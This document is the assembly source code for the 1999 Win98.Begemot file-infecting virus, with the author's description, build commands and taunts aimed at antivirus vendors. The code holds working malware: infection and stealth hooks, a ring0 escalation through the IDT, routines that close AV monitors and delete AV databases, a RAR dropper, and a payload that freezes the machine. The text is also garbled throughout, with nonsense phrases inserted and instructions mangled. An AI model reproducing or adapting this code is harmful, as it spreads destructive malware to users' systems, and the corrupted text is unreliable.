Where is Xomiyo knowing is Xomiyo knows? Where is Xomomo? What am Xiaoyi BG.ASM]?; 苒 苒? 苒? 苒? 苒?圹?;??????; Win98.begemot.8192 苘苒 圻 咣 咣 圹? 圹?; By Benny / 29A 苘? 苘苘 苘苘???圹? 圹???;
;
;
Author's Description
Where is Xiyomo know?
I'm Very Proud to Introduce My Best Virus. I Wanded to Show Ya in this Virus,
What everything i can. there is aren't all my favourite techniques (Such AS)
Memory mapped files, Nevertheless I Think this is a good virus. I Tried to
; Optimize It As Much As I Could, But There Is Still for SomeThating, That
Could Be Optimized Much More Than IT IS. But That A Life ... i Call IT
Win98 Infector Coz I Tested It Only On My Win98 Machine. It Should Work ON
Win95 Also, But Devil Never Sleeps. I'm Not Sure, So That's Why i Call IT
Win98. Hmmmm, Okay, That Was The Foreword, and now here is what promised
DESCRIPTION ...
;
This Virus Is The Win98 Resident / Semi-Stealth / Compressed / Slow Poly / Pentium /
Multithreaded / Ring3 / Ring0 / PE / RAR / FAST INFECTOR. IT Also deletes Some av
Databases / Killin Some Av Monitors / Uses vxdcall0 Backdoor to Call DOS
; Services / USIN 'undocumented opcode and can INFECT EXE / SCR / RAR / SFX / CPL / DAT / BAK
Files. IT appends to last section in pe files / inserts Win9x Dropper Into Rar
Files and enlarge files with constant size, what's 8192 bytes. (i Decid,
This is Perfect Number, Noone Will Mind.) IT Uses BPE32 (Benny's Polymorphic
Engine for Win32, Published in DDT # 1) And BCE32 (Published in 29a # 4) Engines.
; BPE32 HAS Perfect SEH TRICK (IT Fools Many AVS) and BCE32 Saves About 1,9kb
; Of Virus Code (!!!). Combination of these Engines IS My Virus, That IS (in
THIS TIME - SUMMER 1999) Undetectable by Any Heuristic Methods (ONLY FIRST)
Generation of virus is detectable). I Tested It with Drweb (IMO THE BEST AV), NODICE32 (IMO THE Second Best), AVP (Perfect Scanner, But ...) And Many Otherz.
;
But That's Not All. If Virus Will Get Resident In Memory, Virus Will Jump To
Ring0, IT Create VMM Thread (System Thread) Which Will Patch Ring3 Code and So
Allow Ring3 Code Execution and Leave Ring0. Ring3 Code Will Run on, while
Thread Will Run in Memory on the Background. Thread Will Allocate 1kb of
; Shared Memory (Memory Accesible To All Processes) and Slowly Check for
Changes in it. if ANY Change Will Appear, Thread Will Do Property Action,
Dependin 'on change. why? i coded next to bg Communication Console, Called
; BGVCC (Begemot Virus Communication Console), SO IF Virus Is Resident in
; Memory, U CAN Easily Communicate with Virus Thread by it. Look at BGVCC
Source and U Will See, How can u Easily Communicate With / Control Virus.
This is The first virus with communication interface.
;
IT Also Uses Many Trix To Fool AVS, E.G. SEH, Spec. Thread, Retf etc ...
;
;
;
Vocabulary (these Words R Offen Used)
Where is Xombe? Where is Xomotion? Where is Xun?
;
(BG - Win98.begemot, this Virus.
; BGVCC - Begemot Virus Communication Console, Utility Included
WITH THIS Virus for Controlin 'BG and Communicatin'
; with it.
; BGCB - Begemot Control Block. IF u Watch Any System Manual,
; u Will See THCB (Thread Control Block, VMCB (Virtual
; Machine Control Block, ETC. I DECIDED, BGCB IS RITE
Abbreviation for Callin 'this, Really System Block.
IT Holds All Items, That R Used to Communicate with
BG / BG THREAD.
BG Thread - VMM Thread, Which Manages BGCB.
;
;
;
What WILL HAPPEN ON EXECUTION?
Where is Xiyomo knows? Where is it?
;
Virus Will:
1) Decrypt it's body by polymorphic decryptor; 2) Decompress Virus Body
; 3) CHECK, IF IT IS ALREADY RESIDENT.
; 4) Try to find vxdcall0 API
; 5) Install Virus to Memory
; 6) Kill Some AV Monitors (AVP, NODICE)
; 7) Jump to Host
Virus in Memory Will:
1) Check Requested Service
; - Size Stealth Stage (Stealth and Quit)
; - Infection Stage (Continue)
2) Check FileName
; 3) jump to ring0 (by modifyin 'IDT)
; 4) CREATE New THREAD
; 5) EXIT from Ring0
; 6) Infect file
; 7) Delete Some AV Files
; 8) Jump to Previous Handler
;
;
;
Avp's Description
Where is Xiyomo?
;
Benny's Notes: this is the Worst Description I have EVER Seen for so large
virus as begin portMot IS. u CAN see my notes in [* *]. Well, Here is IT:
;
;
; Win95.begemot [* it's not fully compatible with win95, but with win98 only *]
;
This is a dangerous [* why dangerous ?! *] Memory Resident Parasitic
Polymorphic Windows Virus About 8kb of Length. The Virus Installs Itself Into
; the windows memory [* shared memory! *] and infects pee files [* and rar
Files *] That area involsses. The Virus Uses System Calls That Are Valid Under
WIN95 / 98 Only [* Blah, Some Calls R Valid Only in Win98 *] and can't spread
Under nt. The Virus Also Has Bugs and offen halts the system when run [* Which
One ?! *]. The Virus Usess Several Unusual Routines in ITS Code: Keeps ITS CODE
; Encrypted and Compressed In Affected Files (While Installing IT Decompresses
; IT); INFECTS RAR Archives (Adds Infected Beer.exe File [* Dropper! *] To
Archives); Runs a Thread That Can Communicate with External Module [* U mean
; BGVCC? *] Which Controls The Virus (for Example, Enables / Disables Infection
Routine) [* I Thought u Will Talk Much More About BGVCC *] .;
; The Virus Also Looks for "AVP Monitor" and "Amon Antivirus Monitor" Windows
And Closes Them; deletes several anti-virus data files; depending on the
; System Timer Displays a Message [* u forward it or why u can't write here
What Message IT IS ?! *].
;
The Virus Also Contains The "Copyright" Text:
;
Virus Win98.begemot by Benny / 29A
;
[* That's all about my 8kb virus, kasperpig ?! *]
;
;
;
PayLoad
Where is it?
;
Every Execution Virus Test Tick Counter for 22h Value. If Matches, Virus Will
DISPLAY MESSAGEBOX.
;
;
;
Greetz
Where is it?
DARKMAN / 29A .... u Said Amsterdam? Hmmm, prepare yourself for bath
In the River :-)).
Super / 29a ... w0rkoholic!
Griyo / 29a ... so here is it with threads. HPS R0X, Kewl Tutes ...
Thanx for all ...
BILLY_BEL ... DDT # 1 R0X0R, No Lie! Maybe, Ehrm ... Vx and politix,
.
MGL .......... .cz / .sk rulez !!!
; IntelServ ... Tell Me, How is this feelin ', WHEN u Know, That
EveryBody Hate U!
Kaspersky ... That's all u can ?!
;
;
;
How to build
Where is it? Where is it?;
Tasm32-ml -q -m9 bg.asm
; TLINK32-Tpe -c -x -aa -r bg.obj,, in import32
Pewrsec.com Bg.exe
;
;
;
For who is this dedicated?
Where is Xomo know? Where is it?
I Dunno YET. But I can say, for who ain't this virus dedicated. It ain't for
; PPL Such As IntelServ, for Jerx, for Stupid PPL, For InTolerate PPL, FOR
Any Fanatic PPL (Fascists, Capitalistix and Communists, for My Teachers At
; School, For Those, WHO CAN't Use Brain, for Braggers. This Virus is Dedicated
For Smart PPL, Whoever Is It, WHATER IS Color of Their Skin, Wherever IS
ivin '. Important isn't grade, important is what u Have in Your Head !;
;
;
(c) 1999 Benny / 29a. Enjoy!
.586p; why not;)
.MODEL FLAT; FLAT MODEL
Include Mz.inc; Include Some Important
Include pe.inc; incrude-filez
Include Win32API.inc
INCLUDE USEFUL.INC
BG_IDLE EQU 0; Some Equate
BG_INFECTINEXEC EQU 1; Used
BG_INFECTINRAR EQU 2; by Communication
BG_STEALTHIN EQU 3; Thread
PC_Writeable Equ 00020000H; Equates Used
PC_USER EQU 00040000H; in Installation
PR_Shared EQU 80060000H; Stage
PC_Present EQU 80000000H
PC_Fixed EQU 00000008H
PD_ZEROINIT EQU 00000001H
MEM_SIZE EQU (Virtual_END-START 0FFFH) / 1000H; Size of Virus in
Memory (PAGES)
EXTRN EXITPROCESS: PROC; Used in First
Generation Only
.DATA; DATA Section
Start:; Start of Virus
Pushad; save all regs
Call GD; Get Delta Offset
GD: POP EBP; ...
Lea ESI, [EBP _COMPRESSED_ - GD]; WHERE IS Compressed Virus
Stored
Lea EDI, [EBP DECOMPRESSED - GD]; WHERE WILL BE Virus
Decompressed
Mov ECX, 12345678H; SIZE OF Compressed Virus
c_size = dWord PTR $ - 4
; Decompression Routine from BCE32 Starts Here.
Pushad; save all regs
XOR Eax, Eax; EAX = 0
XOR EBP, EBP; EBP = 0
CDQ; EDX = 0
LODSB; Load Decryption Key
Push Eax; Store IT
LODSB; load first byte
Push 8; Store 8
Push Edx; Store 0
D_BITS: Push Ecx; Store ECX
Test Al, 80h; Test for 1
JNE DB0
Test Al, 0C0H; Test for 00
JE DB1
Test Al, 0a0h; test for 010
JE DB2
MOV CL, 6; ITS 011
JMP TB2
TESTB: TEST BL, 1; Is IT 1?
JNE P1
Push 0; No, Store 0
_TB_: MOV EAX, EBP; loading byte to eax
OR Al, [ESP]; SET BIT
Ror Al, 1; And make Space for Next ONE
Call cbit
RET
P1: Push 1; Store 1
JMP _TB_; and continche
DB0: XOR CL, Cl; CL = 0
MOV BYTE PTR [ESP 4], 1; Store 1TestBits:
Push Eax; Store IT
Push ebx; ...
MOV EBX, [ESP 20]; Load Parameter
Ror BL, Cl; Shift to Next Bit GROUP
Call testb; test bit
Ror BL, 1; Next bit
Call testb; test it
POP EBX; RESTORE REGS
POP EAX
MOV ECX, [ESP 4]; Load Parameter
BCOPY: CMP BYTE PTR [ESP 8], 8; 8. bit?
JNE DNLB; NOPE, Continue
MOV EBX, EAX; load next byte
Lodsb
XCHG EAX, EBX
MOV BYTE PTR [ESP 8], 0; And Nulify Parameter
DEC DWORD PTR [ESP]; Decrement Parameter
DNLB: SHL Al, 1; Next Bit
TEST BL, 80H; Is IT 1?
JE NB; NO, Continue
OR Al, 1; Yeah, SET BIT
NB: ROL BL, 1; Next bit
Inc Byte PTR [ESP 8]; Increment Parameter
Loop bcopy; and align next bits
POP ECX; Restore ECX
INC ECX; Test Flags
Dec ECX; ...
JNS D_BITS; if Not Sign, Jump
POP Eax; Delete Pushed Parameters
POP EAX; ...
POP EAX; ...
Popad; Restore All Regs
JMP Decompressed
CBIT: Inc EDX; Increment Counter
CMP DL, 8; BYTE FULL?
JNE N_BYTE; NO, Continue
StoSb; Yeah, Store Byte
XOR Eax, Eax; And Prepare Next One
CDQ; ...
N_BYTE: MOV EBP, EAX; Save Back Byte
RET PSHD; Quit from Procedure With One Parameter on Stack
DB1: MOV CL, 2; 2. Bit in Decryption Key
MOV [ESP 4], CL; 2 Bit Wide
JMP TestBits; Test Bits
DB2: MOV CL, 4; 4. Bit
TB2: MOV BYTE PTR [ESP 4], 3; 3 Bit Wide
JMP TestBits; Test Bits
_COMPRESSED_ DB 1A00H DUP (?); Here Is Stored Compressed
virus body
DB Virus_END-COMPRESSED DUP (?); Here Decompressed
DB SIZE_UNINT DUP (?); and here all uninitialize
Variables
Virtual_end:; End of Virus in Memory
ENDS
.code; code; code
First_gen:; First Generation Code
Mov ESI, Offset Compressed; Source
MOV EDI, OFFSET _COMPRESSED_; DESTINATION
MOV ECX, Virus_end-Compressed 2; SiZemov EBX, Offset Workspace1; Workspace1
Mov Edx, Offset Workspace2; Workspace2
Call Bce32_compress; Compress Virus Body!
Dec EAX
MOV [c_size], eax; save compressed virus size
JMP START; JMP TO VIRUS
COMPRESSION ROM BCE32 Starts Here. This is used.
BCE32_COMPRESS PROC
Pushad; save all regs
Stage 1
Pushad; and Again
CREATE_TABLE:
Push Ecx; Save for L8R Usage
Push 4
POP ECX; ECX = 4
LODSB; Load Byte To Al
L_Table: Push Eax; Save IT
XOR EDX, EDX; EDX = 0
And Al, 3; this Stuff Will Separate and Test
JE ST_END; BIT GROUPS
CMP AL, 2
Je ST2
CMP Al, 3
Je ST3
ST1: inc Edx; 01
JMP ST_END
ST2: inc Edx; 10
Inc EDX
JMP ST_END
ST3: MOV DL, 3; 11
ST_END: INC DWORD PTR [EBX 4 * EDX]; Increment Count In Table
POP EAX
Ror Al, 2; Next Bit Group
LOOP L_TABLE
POP ECX; Restore Number of Bytes
Loop Create_Table; Next Byte
Push 4; this will check for same number
POP ECX; ECX = 4
RE_T: CDQ; EDX = 0
T_loop: MOV Eax, [EBX 4 * EDX]; Load Dword
INC DWORD PTR [EBX 4 * EDX]; Increment IT
CMP EAX, [EBX]; test for Same Numbers
Je _inc_; ...
CMP EAX, [EBX 4]; ...
Je _inc_; ...
CMP EAX, [EBX 8]; ...
Je _inc_; ...
CMP EAX, [EBX 12]; ...
JNE Ninc_; ...
_inc_: incd DWORD PTR [EBX 4 * EDX]; Same, Increment IT
Inc ECX; Increment Counter (Check It in Next Turn)
NINC_: CMP DL, 3; TABLE OVERFLOW?
JE RE_T; YEAH, ONCE AGAIN
Inc EDX; Increment Offset To Table
Loop t_loop; loop
Popad; Restore Regs
Stage 2
Pushad; save all regs
MOV ESI, EBX; Get Pointer to Table
Push 3
POP EBX; EBX = 3
MOV ECX, EBX; ECX = 3
Rep_sort:; bubble sort = the biggest value will
Always "Bubble Up", SO We know Number; Steps
Push Ecx; Save IT
MOV ECX, EBX; SET POINTERZ
Mov EDI, EDX; ...
Push EDX; Save IT
LODSD; LOAD DWORD (Count)
Mov Edx, EAX; Save IT
Sort: lodsd; loading next
CMP EAX, EDX; IS IT Bigger
JB Noswap; No, Store IT
Xchg Eax, EDX; Yeah, Swap DWORDS
Noswap: StOSD; Store IT
Loop Sort; Next DWORD
Mov Eax, Edx; Biggest in Edx, SWAP IT
Stosd; and store
Lea ESI, [EDI-16]; Get Back Pointer
POP EDX; Restore Regs
POP ECX
Loop rep_sort; and try next dword
Popad
Stage 3
Pushad; save all regs
XOR Eax, Eax; EAX = 0
Push Eax; Save IT
Push 4
POP ECX; ECX = 4
N_Search:
Push EDX; Save Regs
Push ECX
Lea ESI, [EBX 4 * EAX]; Get Pointer to Table
Push Eax; Store Re
LODSD; LOAD DWORD TO EAX
Push 3
POP ECX; ECX = 3
Mov Edi, ECX; SET POINTERZ
Search: MOV ESI, EDX
Push Eax; Save IT
LODSD; loading next
MOV EBP, EBP
POP EAX
CMP EAX, EBP; END?
JE END_SEARCH
Dec Edi; Next Search
SUB EDX, -4
Loop Search
END_SEARCH:
POP EAX; and Next Step
INC EAX
POP ECX
POP EDX
Add [ESP], EDI
ROL BYTE PTR [ESP], 2
Loop n_search
POP [ESP.PUSHAD_EBX]; Restore All
POPAD; ...
; Stage 4
XOR EBP, EBP; EBP = 0
XOR EDX, EDX; EDX = 0
MOV [EDI], BL; Store Decryption Key
Inc EDI; Increment Pointer
Next_BYTE:
XOR Eax, Eax; EAX = 0
Push ECX
LODSB; Load Next Byte
Push 4
POP ECX; ECX = 4
Next_bits:
Push Ecx; Store Regs
Push EAX
And Al, 3; Separate Bit Group
Push Ebx; Compare with Next Group
And BL, 3
CMP AL, BL
POP EBX
JE CB0
Push Ebx; Compare with Next Group
Ror BL, 2
And BL, 3
CMP AL, BL
POP EBX
JE CB1
Push Ebx; Compare with Next Group
Ror BL, 4
And BL, 3
CMP AL, BL
POP EBX
JE CB2
Push 0; store bit 0
Call copy_bit
Push 1; Store Bit 1call Copy_bit
CB0: Push 1; Store Bit 1
END_CB1: Call Copy_bit
POP EAX
POP ECX
Ror Al, 2
Loop next_bits; next bit
POP ECX
Loop next_byte; Next byte
Mov Eax, EDI; Save New Size
Sub eax, [esp.pushad_edi]; ...
MOV [ESP.PUSHAD_EAX], EAX; ...
Popad; Restore All Regs
CMP EAX, ECX; Test for Negative Compression
JB C_OK; POSTIVE COMPRESSION
STC; CLEAR FLAG
Ret; and quit
C_OK: Clc; Negative Compression, Set Flag
Ret; and quit
CB1: Push 0; Store Bit 0
END_CB2: CALL COPY_BIT
Push 0; store bit 0
JMP END_CB1
CB2: Push 0; Store bit 0
Call copy_bit
Push 1; Store Bit 1
JMP END_CB2
COPY_BIT:
MOV EAX, EBP; Get Byte from EBP
SHL Al, 1; Make Space for Next Bit
OR Al, [ESP 4]; SET BIT
JMP CBIT
BCE32_COMPRESS ENDP; End of Compression Procedure
Compressed:; Compressed Body Starts Here
@Seh_setupframe
DB 0D6H; undoc. Opcode Salc
Used ONLY TO FOOL AVS
Call Gdelta; Calculate Delta Offset
GDELTA: POP EBP
MOV EBX, 0BFF70000H; Base Address of K32 (95/98)
MOV EAX, [EBX.MZ_LFANEW]; GET PTR to PE
Add Eax, EBX; Make IT Raw Ptr
Mov edi, [eax.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddress]
Add EDI, EBX; GET Virtual Address of et Virtual Address
MOV ESI, [EDI.ED_ADDRESSOFFUNCTIONS]; Get Start Address of Exported
Add ESI, EBX; Functions
XOR EDX, EDX; EDX = 0
L_addr: Cmp Edx, [EDI.ED_NUMBEROFFUNCTIONS]; END OF FUNCTIONDRESSES?
JNB end_host; yeah, jump to host
Push 7
POP ECX; ECX = 7
L_Func: Inc EDX; EDX
LODSD; LOAD DWORD
CMP EAX, [ESI]; addresses Equal?
JNE L_ADDR; NO, Next Function
Loop l_func; yeah, next check
Add Eax, EBX; Make IT Raw Ptr
MOV [EBP VXDCALL0 - GDELTA], EAX; and Save Address of vxdcall0
Xchg Eax, ESI; Eax <=> ESIXOR EAX, Eax; Residency Check
MOV AH, 2AH; Get System Time
Mov EDI, '! BG!'; Our SIGN
Call Int21H; Call Int21h dispatcher
CMP ESI, 1982; ALREADY RESIDENT?
Je end_host; yeah, jump to host
Push PC_WRITEABLE OR PC_USER; NOW WE WILL RESERVE MEMORY
Push Mem_Size; for Our Virus Body in Shared
Push Pr_Shared; Area of Virtual Memory, SO IT
Push 00010000H; Will Be Visible for ALL
Call [EBP VXDCALL0 - GDELTA]; Processes
INC EAX; Error?
Je end_host; yeah, jump to host
Dec Eax; NO, Continue
MOV EBX, EAX; Save Address to EBX Register
CMP EAX, 80000000H; Is IT IN Shared Area?
JB PG_Free; No, Free Pages and Quit
MOV [EBP MEM_ADDR - GDELTA], EAX; Save Address
PUSH PC_WRITEABLE OR PC_USER OR PC_PRESENT OR PC_FIXED
Push 0; Now We Will Commit
Push Pd_zeroinit; Physical Space for Our
Push mem_size; reserved pages.
SHR EAX, 0CH
Push EAX
Push 00010001H
Call [EBP VXDCALL0 - GDELTA]
XCHG EAX, ECX; Error?
JECXZ PG_Free; Yeah, Free Pages and Quit
Push Ebx; Save Address
Sub ebx, compressed-vxdcall_addr- (Decompressed-Start)
MOV [EBP JUMP_LOC - GDELTA], EBX; Store Handler Location
MOV ECX, 100H; Now We Will Search for
Vxdloop: Lodsb; Call Instruction
CMP Al, 2EH; IS IT "CS:" SELECTOR OVERRIDE?
JNE VXDNEXT; NO, NEXT BYTE
CMP Word PTR [ESI], 1DFFH; and is it u in??
Je got_ptr; Yeah, We got ptr to memory
VxDNext: loop vxdloop; no, next try
POP EBX; EBX = Address Our Pages
PG_Free: Push 0; Shit, Address Not Found,
Push Ebx; We Have to Free Pages
Push 0001000ah; and jump to host
Call [EBP VXDCALL0 - GDELTA]; Free Pages Call
JMP END_HOST; (((((((((
Got_ptr: MOV EDI, [ESP]; Get Address of Our Pages
Pushad; save all registers
LEA ESI, [EBP COMPRESSED-GDELTA- (Decompressed-Start)] MOV ECX, (Virtual_END-START 3) / 4; Copy Virus to Shared Memory
Rep Movsd; ...
Popad; restore all registers
CLI; Exclusive Execution
INC ESI; SKIP INSTRUCTION
Inc ESI
LODSD; LOAD Address from instruction
Push Eax; Store IT
XCHG Eax, ESI; ESI = Address
MOV EDI, EBX; EDI = Original Address of Address
Push 6
POP ECX; ECX = 6
Rep Movsb; Save Original 48bit Address
POP EDI; Restore Address
POP EAX; Get Ptr to Shared Memory
Sub eax, compressed-vxdcall_hook- (Decompressed-Start)
StOSD; Store Address of Our Handler
MOV Eax, CS; Selector
StoSw; Store Selector
STI; NonexClusive Execution ...
END_HOST:
IN AL, 40H; Is IT Rite Time To Activate
CMP AL, 22; OUR payload?
Je do_payload; yeah
Lea ESI, [EBP SHITTYMONS - GDELTA]; NO, But Lets Kill Some
XOR EDI, EDI; AV MONITORS
Push 2
POP ECX; 2 Monitors
Killmons:
Push ECX
PUSH ESI
Push EDI
Call [EBP FNDWNDA - GDELTA]; Find Window
TEST EAX, EAX; FOUND?
JE next_mon; no, try to kill Other Monitor
Push EDI; Now We will send Message
Push Edi; To av window to kill itself
Push 12h; Veeeeeeeeeery Stupid X-DD
Push EAX
Call [EBP PSTMSGA - GDELTA]; BYE BYE, Hahaha
Next_mon:
Add ESI, 0CH; Next Monitor String
POP ECX
Loop Killmons; Kill ANOTHER ONE
Quit_payload:
@Seh_removeframe; Remove SEH FRAME
Popad; Restore All Regs
Push CS; Now We Will Use Far Return
DB 0A1H; Trick to Fool Some Stupid
DD 400002H.MZ_RES2; Heuristic Scanners. Heh, WHO
Sub Eax, -400000H; Could Expect Someone Will
Push Eax; Far Return In Flat Model, HEH
Retf; jump to host
Do_Payload:; Time for Our PayLoad
Push 1000H; System Modal Window
Call Sztitle; Title of Window
SZTT DB "Virus Win98.begemot by Benny / 29A", 0SHITTYMONS:
DB 'AVP MONITOR', 0
DB 'Amon Antivirus Monitor', 0
Sztitle: Call Sztext; Text Of Window
SZTX DB 'Wait a Minute,', 0DH, 0DH
DB 'micro $ h! t is everywhere u want to be ...', 0DH
DB 'please call micro $ h! t on-line help, if u Have anyproblems.', 0DH
DB 'DON'' TELEPHONE? SO CALL YOUR SYSTEM Supervisor. ', 0DH
DB 'R u supervisor? So Call Micro $ H! T On-line help ...', 0DH
DB 'EHRM, Well ... Where do u want to go y3st3rday?', 0DH, 0DH
DB 'PS: Your Problem ain'' ket - MiRO $ H! T DIDN' '' 'CERTIFIED', 0DH
DB 'this hardware, buy a new one ...', 0DH
DB 'Press Ok Button To Solve this Problem by Micro $ H! T ...', 0
MSGBXA DD 0BFF5412EH
FndWnda DD 0BFF5590CH
PSTMSGA DD 0BFF556FCH
SzText: push 0; hWnd = 0
Call [EBP MSGBXA - GDELTA]; DISPLAY MESSAGE BOX
CLI; Fuck All Preemptives
FuckThemall:
JMP fuckthemall; Infinite loop. System Wont
Switch to another process;)
Write_something:; WriteTofile Procedure
MOV AH, 40H; Write to File Service
JMP INT21H; CALL INT21H
Read_something:; ReadFromFile Procedure
Lea Edx, [EBP HEADER - MGDELTA]; To Header Variable
R_Something: ie iedfromfile procedure2
MOV AH, 3FH; Service Number
INT21H: Push Ecx; Push Parameters
Push EAX
Push 002A0010H; Service Number to VMM
IPATCH: JMP INT21; CALL INT21H
RINT21: CALL [EBP VXDCALL0 - MGDELTA]; Resident Version of Int21h
RET
INT21: Call [EBP VXDCALL0 - GDELTA]; Runtime Version of Int21H
RET
AV Filez Born to Be deleted
SHITTYFILEZ: DB 'Drwebase.vdb', 0; BYE-KASPERSKY
DB 'NOD32.000', 0; BYE-TRNKA
DB 'avg.avi', 0; Bye-Odehnaldb 'anti-vir.dat', 0; BYE-TBAV
DB 'Avp.crc', 0; BYE-AVP
Rarheader:; no comment;)
RarheaderCrc DW 0
Rartype DB 74H
RARFLAGS DW 8000H
Rarhsize dw end_rar-rarheader
RARCOMPRESSED DD 3000H
Raroriginal DD 3000H
Raros DB 0
RARCRC32 DD 0
RARFILEDATETIME DD 12345678H
Rarneedver DB 14h
Rarmethod db 30h
Rarfnamesize dw end_rar-rarname
RARATTRIB DD 0
Rarname DB 'Beer.exe'
End_rar:
Last_test:
CMP AH, 2AH; GET SYSTEM TIME?
JNE EXIT_INFECTION; NO, Back to Original Handler
CMP EDI, '! BG!'; Our SIGN?
JNE EXIT_INFECTION; NO, Back to Orig. Handler
Popad; restore all registers
Mov ESI, 1982; MARK THIS
JMP Farjmp; and quit
Vxdcall_hook proc; vxdcall hooker starts here
Pushad; save all regs
Call Mgdelta; Get Delta Offset
Mgdelta: POP EBP
XOR ECX, ECX; ECX = 0
MOV CL, 1; Cl = Semaphore
Semaphore = byte PTR $ - 1
Jecxz quit_hook; we Wont TRACE OUR Calls
CMP EAX, 002A0010H; INT21H DISPATCH SERVICE?
JNE quit_hook; no, quit
MOV EAX, [ESP 2CH]; Get Service Number
CMP AH, 3DH; OPEN FILE?
JE Infect
CMP AH, 43H; GET / SET Attributes
JE Infect
CMP AX, 6C00H; Extended Create / Open
JE Infct2
CMP AH, 71H; ANY LFN SERVICE?
JNE Last_Test
CMP Al, 43H; Extended Get / Set Attributes?
JE Infect
CMP AL, 4EH; LFN FIND FIRST FILE
Je Stealth
CMP AL, 4FH; LFN FIND NEXT FILE
Je Stealth
CMP Al, 56H; LFN Rename File
JE Infect
CMP Al, 6CH; LFN Extended Open
JE Infct2
CMP AL, 0A8H; LFN Short Name
JE Infct2
EXIT_INFECTION:
MOV BYTE PTR [EBP SEMAPHORE - MGDELTA], 1; SET SEMAPHORE
MOV BYTE PTR [EBP V_STATE - MGDELTA], BG_IDLE; SET VIRUS STATE
Quit_hook:
Popad; Restore All Regs
Farjmp: JMP fword PTR CS: [12345678H]; and jump tojump_loc = DWORD PTR $ - 4; Previous Handler
S_INT21H:; INT21H for Stealth
Push ECX; Function
Push EAX
Push 002a0010h
Call [EBP VXDCALL0 - SGDELTA]
RET
Stealth:; Stealthin Function Starts Here
MOV BYTE PTR [EBP V_STATE - MGDELTA], BG_STEALTHIN; SET VIRUS STATE
Push DWORD PTR [ESP 28h]; Now We will call Property
POP DWORD PTR [EBP S_RET - MGDELTA]; Function and Get Result
Lea EAX, [EBP API_RET - MGDELTA]
MOV [ESP 28H], EAX; SET RETURN ADDRESS
MOV [EBP FIND_DATA - MGDELTA], EDI; Save Ptr to Win32Finddata
JMP quit_hook; and call prev. Handler
API_RET: JC B2Caller; Return and Get Results
Pushad; Get Delta Offset
Call sgdelta
SGDELTA: POP EBP
MOV EDI, 12345678H; Get Win32Finddata
Find_data = DWORD PTR $ - 4
Lea ESI, [edi.wfd_szfilename]
PUSH ESI
Call C_Name; Check FileName
POP ESI
JC quit_stealth; error, Quit Stealth
MOV BYTE PTR [EBP SEMAPHORE - SGDELTA], 0; SET SEMAPHORE
Mov Eax, 716ch; Extended Open / CREATE FILE
XOR EBX, EBX; FLAGS
XOR ECX, ECX; Attributes
CDQ; action
Inc EDX; ...
Call S_INT21H; CALL IT
JC quit_stealth; error?
XCHG EAX, EBX
MOV AH, 3FH; Read DOS MZ HEADER
Push image_sizeof_dos_header
POP ECX
Lea Edx, [EBP HEADER - SGDELTA]
Call S_INT21H; ...
JC S_Close
CMP Word PTR [EBP Header.mz_res2 - SgDelta], 29ah; IS IT Infected
JNE S_Close; NO, Quit
Add DWORD PTR [EDI.WFD_NFILESZELOW], -2000H; Yeah, Return Original
Size
S_Close: Mov Ah, 3EH; Close File
Call S_INT21H
Quit_stealth:
MOV BYTE PTR [EBP SEMAPHORE - SGDELTA], 1; SET SEMAPHORE
Popad; Restore All Regs
CLC; Clear Carry
B2caller:
Push 12345678h; and jump back
s_ret = dword ptr $ - 4; to host program; ...
ENTERRING0:; RING0 Port
POP EAX; Get Address
Pushad; save all registers
Pushad; and Again
SIDT FWORD PTR [ESP-2]; LOAD 6BYTE Long IDT Address
Popad; Restore Registers
SUB EDI, - (8 * 3); Move To INT3
Push DWORD PTR [EDI]; Save Original IDT
Stosw; Modify IDT
INC EDI; MOVE BY 2
Inc EDI; ...
Push DWORD PTR [EDI]; Save Original IDT
Push Edi; Save Pointer
Mov Ah, 0eeh; IDT Flags
STOSD; Save IT
MOV EBX, CS; Fill Registers with
MOV ECX, DS; Selectors for L8R USE
Mov ESI, ES; ...
Mov EDI, SS; ...
Push ds; save some selectors
Push es; ...
INT 3; JUMPTORING0!
POP ES; Restore Selectors
POP DS; ...
POP EDI; Restore Ptr
Add EDI, -4; Move with PTR
POP DWORD PTR [EDI 4]; and restore IDT
POP DWORD PTR [EDI]; ...
P_jmp: Inc Eax; Some Silly Loop To Fool
CDQ; Some AVS. Will Be overwritten
JMP P_JMP; with nops L8R by New Thread
Popad; Restore All Regs
JMP Leavering0; and Leave Procedure
Thread Proc; Thread Procedure Start Here
Call Tgdelta; Get Delta Offset
TGDELTA: POP EBP
MOV [EBP P_JMP - TGDELTA], 90909090H; OVERWRITE SILLY LOOP BY NOPS
Push PC_WRITEABLE OR PC_USER; RESERVE ONE PAGE
Push 1; in Shared Memory
Push pr_shared; for BGCB
Push 00010000h; ...
Call [EBP VXDCALL0 - TGDELTA]; ...
INC EAX
JE T_SLEP; Error?
Dec EAX
CMP EAX, 80000000H; Is IT IN Shared Memory?
JB free_pg
MOV EBX, EAX; Save Address
PUSH PC_WRITEABLE OR PC_USER OR PC_PRESENT OR PC_FIXED
Push 0; and now We Will Commit
Push Pd_zeroinit; Physical Space In Memory
Push 1; ...
SHR EAX, 0CH; ...
Push Eax; ...
Push 00010001h; ...
Call [EBP VXDCALL0 - TGDELTA]; ...
Test Eax, Eax; IF Error, Free Pages
JE FREE_PG; and quit
Some Equates for BGCB
BGCB_SIGNATURE EQU 00; BGCB SIGNATURE ('BGCB') BGCB_New EQU 04; New Request (1-New, 0 NOT)
BGCB_ID EQU 08; ID of REQUEST
BGCB_DATA EQU 12; Property Data
EAX = 1, ECX = 0
MOV [EBX.BGCB_SIGNATURE], 'BCGB'; SET SIGNATURE
T_rep: Call T_Sleep; Sleep for Some MS
CLI; Exclusive Execution
CMP [EBX.BGCB_NEW], ECX; Anything New?
JE T_END; NO
MOV [EBX.BGCB_NEW], ECX; YEAH, NULIFY ITEM
MOV EDX, [EBX.BGCB_ID]; and check id
Test EDX, EDX; 0?
JE P_TEST; Virus Presency Check
DEC EDX; 1?
JE i_test; virus state checkin '
DEC EDX; 2?
JE D_TEST; Disable Virus Actions
DEC EDX; 3?
JE E_TEST; Enable Virus Actions
DEC EDX; 4?
JE g_test; get sleep time
DEC EDX; 5?
JE Si_Test; Inplase Sleep Time
DEC EDX; 6?
JE SD_TEST; DECREASE SLEP TIME
DEC EDX; 7?
JE K_TEST; System Halt
DEC EDX; 8?
JE DS_TEST; DISCONNECT
T_END: STI; Allow INTS
JMP T_rep; and sleep
P_test: MOV [EBX.BGCB_DATA], EAX; Set BGCB Data TO 1
JMP T_END
I_TEST: MOV BYTE PTR [EBX.BGCB_DATA], 0; SET BGCB DATA TO V_STATE
v_state = byte PTR $ - 1
JMP T_END
